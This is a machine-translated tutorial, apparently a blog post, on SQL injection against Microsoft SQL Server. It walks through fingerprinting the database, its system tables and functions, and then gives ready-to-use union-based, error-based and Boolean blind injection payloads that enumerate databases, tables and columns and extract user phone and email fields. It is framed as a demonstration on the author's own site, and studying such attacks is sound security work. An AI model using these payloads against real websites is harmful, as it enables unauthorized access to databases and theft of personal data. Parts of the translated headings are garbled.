Catalog

One 、 How to judge whether the website uses sql server database

Two 、sql server The database contains three main system tables

3、 ... and 、sql server Main function

Four 、 Database injection process

5、 ... and 、sql server Joint query for

6、 ... and 、sql server Error injection of

7、 ... and 、sql server Boolean blind note .

One 、 How to judge whether the website uses sql server database

• According to the suffix ： If the suffix is aspx, The database is about sql server
• Judge according to the error information , The error message contains Microsoft word .
• Judge according to the system table ,and (select count（*）from sysdatabases) >0 , If it works , It means that it contains this system table , It can be judged as sql server database  sql server The database contains three main system tables

Two 、sql server The database contains three main system tables

1. sysdatabases : This form is saved in master In the database , Inside name The database names of all databases are stored under the field . 
2. sysobjects： This table stores the information of the database table , Inside id Fields are stored in tables id,name Is the name of the watch ,xtype Fields store the type of table ,u Represents the table created for the user ,s Indicates that the table is a system table .
3. syscolumns： This table stores the information of fields in the database ,id For the table id, The id Can pass sysobjects get .name For field name .

3、 ... and 、sql server Main function

1. host_name() : Return the server-side host name .
2. current_user()： Return the current database user .
3. db_name(): Returns the name of the current database  .
4. char(): take ASCII Code into the corresponding character .
5. ASCII(): Convert the character to the corresponding ASCII code .
6. substring(): Intercepting string .

Four 、 Database injection process

1. Get database name
2. Get the name of the table in the database
3. Get the column name of the table in the database
4. Get the corresponding data  

5、 ... and 、sql server Joint query for

1. Use union keyword

2. Use union Joint query considerations  

• First of all, you need to know the number of columns to query , Use order by n Judge n Indicates the specific number of columns .
• sql server Database and MySQL The difference between databases is ,sql server The data types before and after the database must be consistent .
• Determine the display position of the data .
• Make the previous query result empty .

3.sql server Demonstration of database using joint query .

notes ： This website is a personal website , Do not use real websites to attack .

3.1 First, judge the injection point , Secondly, judge the injection type  

Add single quotes , Error message found  

3.2 Use it directly 2-1 Determine its data type

Page echo found successful , So it can be determined as digital , Next use union The joint query

3.3 Use order by Judge the number of columns

You can find that the number of columns is 13 Column

3.4 Confirm the data type of each column , Therefore, it is found that the data types are incompatible , have access to null Replace

When we all use null when , It's still wrong to find out , The reason for this error is union Statements remove duplicates by default when merging queries , That is to say, it is executed by default distinct operation .

Therefore, it is necessary to union Change it to union all Do not remove duplicates , This error can be solved . Generally, you can get the database directly after you get here , But the environment here is wrong , It indicates that when the query is found , There are also data type mismatches , Continue to replace from the beginning with null , Until no error is reported . It was finally determined to be 3,4,6,7,10,11 Character , 1,2,5,8,9,12,13 It is digital

3.5 Now you can get the relevant information of the database through joint query on the homepage

3.5.1 Get database name

payload：id=1  UNION all SELECT 1,2,name,null,5,null,null,8,9,null,null,12,13 from master..sysdatabases

3.5.2 Get the library name of the current database

payload：id=1  UNION all SELECT 1,2,db_name(),null,5,null,null,8,9,null,null,12,13 from master..sysdatabases

3.5.3  Get the table name in the database

payload：id=1  UNION all SELECT 1,2,name,null,5,null,null,8,9,null,null,12,13 from jiaofan..sysobjects where xtype = 0x75 

3.5.4 Get the field of the current table name

payload：id=1  UNION all SELECT 1,2,name,null,5,null,null,8,9,null,null,12,13 from jiaofan..syscolumns where id = (select id from jiaofan..sysobjects where name = 0x73006C005F007500730065007200)

5.3.5 Get the specific value under the field

payload：id=1  UNION all SELECT 1,2,shouji,null,5,youxiang,null,8,9,null,null,12,13 from  sl_user

6、 ... and 、sql server Error injection of

Similar to other database error injection .

1.sql server Demonstration of error injection

1.1 Get the current database

payload：id=1  and 1=(select db_name())

1.2 Get all databases （ Because we use and 1= () Error reporting in progress , So only one value can be obtained at a time , You can use top function ）

payload：id=1  and 1= (select top 1 name from master..sysdatabases) 

If you want to get the second row of data ,

payload：id=1  and 1= (select top 1 name from master..sysdatabases where name not in( select top 1 name from master..sysdatabases )) 

1.3 Get the table name of the current database

payload:id=1 and 1= (select top 1 name from jiaofan..sysobjects where xtype = 0x75) 

1.4 Get the field name in the table

Because it involves two tables , So you can combine the two tables

payload：id=1 and 1= (select top 1 c.name from jiaofan..syscolumns c ,jiaofan..sysobjects o where c.id = o.id and o.name =0x73006C005F007500730065007200 ) 

7、 ... and 、sql server Boolean blind note .

1.sql server Demonstration of Boolean blind note

1.1 Get the number of databases

payload：id=1 and (select count(*) from master..sysdatabases) >7

 id=1 and (select count(*) from master..sysdatabases) >8

1.2 Get the information of the current database

payload：id=1 and substring((select db_name()),1,1)=char(106)